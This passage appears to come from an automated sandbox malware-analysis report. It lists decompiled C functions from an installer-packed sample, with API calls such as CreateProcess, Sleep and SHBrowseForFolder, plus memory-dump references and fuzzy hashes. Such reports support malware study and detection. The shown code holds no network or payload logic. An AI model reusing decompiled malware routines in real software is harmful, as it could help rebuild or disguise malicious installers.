                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: f50e63b132b24878aef5dc53f281ae586e67706c8815a59119a5f52f37cdf5c1
                                                            • Instruction ID: f33369c0959fc2f31fb2d94020f8cc99ded583a01a7fd26deb419bde1f84e5de
                                                            • Opcode Fuzzy Hash: f50e63b132b24878aef5dc53f281ae586e67706c8815a59119a5f52f37cdf5c1
                                                            • Instruction Fuzzy Hash: 52C09B757447017FEA159F619D45F077798B760B01F1544397750F70D0C674D410D61C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040336B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040336B(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                            0x00403379
                                                            0x0040337f

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030D1,?,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00403379
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                            • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                            • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                            • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404309 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404309(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x452428, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                            0x00404317
                                                            0x0040431d

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: c30535afd169c14e8b4d040e998dc10ef2daf8ec42941babfa575ffd1ce924aa
                                                            • Instruction ID: 9ea9f7192fe415255892c7c1483d18bd9fbebf719f850706ff9b0d6542640036
                                                            • Opcode Fuzzy Hash: c30535afd169c14e8b4d040e998dc10ef2daf8ec42941babfa575ffd1ce924aa
                                                            • Instruction Fuzzy Hash: E5B09236184A00ABDA124B10DE09F497A62A769702F008029B240250B0CAB240A0EB28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004042F6 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004042F6(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x43c08c, _a4); // executed
				return _t2;
			}




                                                            0x00404300
                                                            0x00404306

                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,004040D2), ref: 00404300
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 85b1628437d6bc2e0a85985499539ad5df80abf1265e93d00aa480f3fdb0d289
                                                            • Instruction ID: 9ba761fd450edde39ad44ae3507cba1171b2616f218c63448c15d7f08a3949a3
                                                            • Opcode Fuzzy Hash: 85b1628437d6bc2e0a85985499539ad5df80abf1265e93d00aa480f3fdb0d289
                                                            • Instruction Fuzzy Hash: 87A00275444540DBCB055B50EF44D067B71A794701711D579A1459103487715460EB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401F7B Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E00401F7B() {
				void* _t8;
				void* _t12;
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402C39(_t14);
				E00405378(0xffffffeb, _t6); // executed
				_t8 = E004058F0(_t19); // executed
				_t20 = _t8;
				if(_t20 == _t14) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t14) {
						_t12 = E004066D8(_t16, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t14) {
							if(_t12 != _t14) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004061B5(_t17, _t12);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}










                                                            0x00401f81
                                                            0x00401f86
                                                            0x00401f8c
                                                            0x00401f91
                                                            0x00401f95
                                                            0x004027c8
                                                            0x00401f9b
                                                            0x00401f9e
                                                            0x00401fa1
                                                            0x00401fa9
                                                            0x00401fb6
                                                            0x00401fb8
                                                            0x00401fb8
                                                            0x00401fab
                                                            0x00401fad
                                                            0x00401fad
                                                            0x00401fa9
                                                            0x00401fbf
                                                            0x00401fc0
                                                            0x00401fc0
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                              • Part of subcall function 00405378: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C), ref: 004053D4
                                                              • Part of subcall function 00405378: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll), ref: 004053E6
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 0040540C
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405426
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405434
                                                              • Part of subcall function 004058F0: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00448098,00000009), ref: 00405919
                                                              • Part of subcall function 004058F0: CloseHandle.KERNEL32(?), ref: 00405926
                                                            • CloseHandle.KERNEL32(?), ref: 00401FC0
                                                              • Part of subcall function 004066D8: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E9
                                                              • Part of subcall function 004066D8: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670B
                                                              • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                            • String ID:
                                                            • API String ID: 2972824698-0
                                                            • Opcode ID: baf91f1c6fac4f5a34fe9a03cbd9f3c9fe76fbf55e55d4b783b403db7f4f4d73
                                                            • Instruction ID: eeb5512819bcec06601acf2d49d3b73d03ea50ea89893d791cfc8d8d466688d4
                                                            • Opcode Fuzzy Hash: baf91f1c6fac4f5a34fe9a03cbd9f3c9fe76fbf55e55d4b783b403db7f4f4d73
                                                            • Instruction Fuzzy Hash: 0FF0BB32905221DBCB20BFA54E88CEFB2A59F05314B24463FF502B21D1C77C4D415A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004014D6(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C17(_t7);
				 *((intOrPtr*)(_t13 - 0x38)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                            0x004014d6
                                                            0x004014d7
                                                            0x004014e0
                                                            0x004014e3
                                                            0x004014e7
                                                            0x004014e7
                                                            0x004014e9
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: c119c5b23c4e7d85942e5466de7459b5dc7c2978c118f2848ef78bda966c211a
                                                            • Instruction ID: 8a2e161516ab7e1e90c22bd31bd3d3ce098b98b7261b484d2c6ea91aeb26b437
                                                            • Opcode Fuzzy Hash: c119c5b23c4e7d85942e5466de7459b5dc7c2978c118f2848ef78bda966c211a
                                                            • Instruction Fuzzy Hash: 3FD05E73A242009BD710DBB8BAC545E73A8E7813253308837E102F2091EA78C8418A38
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C212C6 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E73C212C6() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x73c25040); // executed
				return _t1;
			}




                                                            0x73c212ce
                                                            0x73c212d4

                                                            APIs
                                                            • GlobalAlloc.KERNELBASE(00000040,73C211C4,-000000A0), ref: 73C212CE
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: AllocGlobal
                                                            • String ID:
                                                            • API String ID: 3761449716-0
                                                            • Opcode ID: f88dc9d0528d76b3c231bbae570a45abb965b0c6ac03a80ab392732e58e35e86
                                                            • Instruction ID: fe8951b7d71ed542aed00a0b4bc1995700da3f6b982137bbff26964831af8b5f
                                                            • Opcode Fuzzy Hash: f88dc9d0528d76b3c231bbae570a45abb965b0c6ac03a80ab392732e58e35e86
                                                            • Instruction Fuzzy Hash: 61A002B35601909BDF41FB92AD1EF297A21B764702F741044E30D6D0928AB90850DF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00404766 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E00404766(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x438068; // 0x720a3c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xd) + 0x453000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405951(0x3fb, _t146);
					E00406535(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405951(0x3fb, _t146);
							if(E00405CD7(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00406257(0x434060, _t146);
							_t87 = E00406663(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406257(0x434060, _t146);
								_t89 = E00405C82(0x434060);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x434060,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x434060) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x434060,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C30(0x434060);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x434060) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BFA(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x44e3fc + 0x10)) != _t158) {
									E00404BE2(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x434050);
									} else {
										E00404B1D(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x4524c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042F6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x43c080 == _t158) {
									E004046BF();
								}
								 *0x43c080 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x43c090;
							_v60 = E00404AB7;
							_v56 = _t146;
							_v68 = E004062EA(_t146, 0x43c090, _t166, 0x436068, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BE9(_t146);
								_t125 =  *((intOrPtr*)( *0x452430 + 0x11c));
								if( *((intOrPtr*)( *0x452430 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes") {
									E004062EA(_t146, 0x43c090, _t166, 0, _t125);
									if(lstrcmpiA(0x44a3c0, 0x43c090) != 0) {
										lstrcatA(_t146, 0x44a3c0);
									}
								}
								 *0x43c080 =  *0x43c080 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C56(_t146) != 0 && E00405C82(_t146) == 0) {
						E00405BE9(_t146);
					}
					 *0x44e3f8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D4(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D4(_t166);
					E00404309(_t165);
					_t138 = E00406663(8);
					if(_t138 == 0) {
						L53:
						return E0040433B(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}













































                                                            0x00404766
                                                            0x0040476c
                                                            0x00404772
                                                            0x0040477f
                                                            0x0040478d
                                                            0x00404790
                                                            0x00404798
                                                            0x0040479e
                                                            0x0040479e
                                                            0x004047aa
                                                            0x004047ad
                                                            0x0040481b
                                                            0x00404822
                                                            0x004048f9
                                                            0x00404900
                                                            0x0040490f
                                                            0x0040490f
                                                            0x00404913
                                                            0x0040491d
                                                            0x0040492a
                                                            0x0040492c
                                                            0x0040492c
                                                            0x0040493a
                                                            0x00404941
                                                            0x00404948
                                                            0x0040494b
                                                            0x00404982
                                                            0x00404984
                                                            0x0040498a
                                                            0x0040498f
                                                            0x00404993
                                                            0x00404995
                                                            0x00404995
                                                            0x004049b1
                                                            0x00000000
                                                            0x004049b3
                                                            0x004049b6
                                                            0x004049c4
                                                            0x004049ca
                                                            0x004049cb
                                                            0x004049ce
                                                            0x004049d1
                                                            0x00000000
                                                            0x004049d1
                                                            0x0040494d
                                                            0x0040494f
                                                            0x00404953
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404955
                                                            0x00404955
                                                            0x00404962
                                                            0x00404967
                                                            0x00000000
                                                            0x00000000
                                                            0x0040496b
                                                            0x0040496d
                                                            0x0040496d
                                                            0x00404975
                                                            0x00404977
                                                            0x0040497a
                                                            0x0040497d
                                                            0x00404980
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404980
                                                            0x004049dd
                                                            0x004049e7
                                                            0x004049ea
                                                            0x004049ed
                                                            0x004049f4
                                                            0x004049f4
                                                            0x004049f6
                                                            0x004049f6
                                                            0x004049fb
                                                            0x004049fd
                                                            0x00404a05
                                                            0x00404a0c
                                                            0x00404a0e
                                                            0x00404a19
                                                            0x00404a19
                                                            0x00404a0e
                                                            0x00404a29
                                                            0x00404a33
                                                            0x00404a3b
                                                            0x00404a56
                                                            0x00404a3d
                                                            0x00404a46
                                                            0x00404a46
                                                            0x00404a3b
                                                            0x00404a5b
                                                            0x00404a60
                                                            0x00404a65
                                                            0x00404a6e
                                                            0x00404a6e
                                                            0x00404a77
                                                            0x00404a79
                                                            0x00404a79
                                                            0x00404a85
                                                            0x00404a8d
                                                            0x00404a97
                                                            0x00404a97
                                                            0x00404a9c
                                                            0x00000000
                                                            0x00404a9c
                                                            0x0040494b
                                                            0x00404902
                                                            0x00404909
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404909
                                                            0x00404828
                                                            0x00404831
                                                            0x0040484b
                                                            0x00404850
                                                            0x0040485a
                                                            0x00404861
                                                            0x0040486d
                                                            0x00404870
                                                            0x00404873
                                                            0x0040487a
                                                            0x00404882
                                                            0x00404885
                                                            0x00404889
                                                            0x00404890
                                                            0x00404898
                                                            0x004048f2
                                                            0x0040489a
                                                            0x0040489b
                                                            0x004048a2
                                                            0x004048ac
                                                            0x004048b4
                                                            0x004048c1
                                                            0x004048d5
                                                            0x004048d9
                                                            0x004048d9
                                                            0x004048d5
                                                            0x004048de
                                                            0x004048eb
                                                            0x004048eb
                                                            0x00404898
                                                            0x00000000
                                                            0x00404850
                                                            0x0040483e
                                                            0x00000000
